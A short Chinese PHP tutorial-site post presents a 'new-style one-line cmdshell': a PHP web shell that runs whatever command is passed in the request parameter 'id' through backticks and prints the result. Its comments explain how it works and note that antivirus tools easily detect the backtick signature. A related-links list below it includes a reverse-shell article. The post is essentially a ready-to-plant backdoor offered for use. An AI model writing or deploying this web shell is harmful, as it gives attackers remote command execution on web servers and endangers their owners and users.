php一句话cmdshell新型 (非一句话木马)
作者:bea
代码如下: <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型); //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码; //write by skyfire */ echo `$_REQUEST[id]`; ?>
代码如下:
<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>
有用 | 无用
猜你喜欢
您可能感兴趣的文章:
- PHP 身份证号验证函数
- php 购物车的例子
- PHP 错误之引号中使用变量
- PHP 字符串编码截取函数(兼容utf-8和gb2312)
- apache2.2.4+mysql5.0.77+php5.2.8安装精简
- PHP 读取文件的正确方法
- PHP session有效期问题
- PHP 判断常量,变量和函数是否存在
- PHP memcache扩展的三种安装方法
- PHP mb_convert_encoding 获取字符串编码类型实现代码
- php mssql 分页SQL语句优化 持续影响
- 配置Apache2.2+PHP5+CakePHP1.2+MySQL5运行环境
- mysql_fetch_row,mysql_fetch_array,mysql_fetch_assoc的区别
- PHP 危险函数解释 分析
- php反弹shell实现代码
- 将数组写入txt文件 var_export
- php 保留小数点
- PHP 中执行排序与 MySQL 中排序
- 一个php导出oracle库的php代码